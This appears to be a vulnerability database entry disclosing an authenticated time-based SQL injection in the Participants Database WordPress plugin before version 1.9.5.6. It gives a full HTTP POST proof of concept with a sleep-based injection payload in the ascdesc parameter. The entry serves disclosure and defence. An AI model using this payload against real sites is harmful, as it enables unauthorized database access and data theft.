Participants Database < 1.9.5.6 - Authenticated Time Based SQL Injection

Authenticated time-based SQL injection via the ascdesc, list_filter_count, and sortBy parameters.

PoC

Form the original advisory (see references): POST /wp-admin/admin.php?page=participants-database HTTP/1.1 Host: redacted…cause User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: /wp-admin/admin.php?page=participants-database Content-Type: application/x-www-form-urlencoded Content-Length: 169 Connection: close Cookie: cookies were here Upgrade-Insecure-Requests: 1 action=admin_list_filter&search;_field%5B0%5D=&operator;%5B0%5D=LIKE&value;%5B0%5D=&logic;%5B0%5D=AND&list;_filter_count=1&sortBy;=date_updated&ascdesc;=desc%2c(select*from(select(sleep(20)))a)&submit-button;=Sort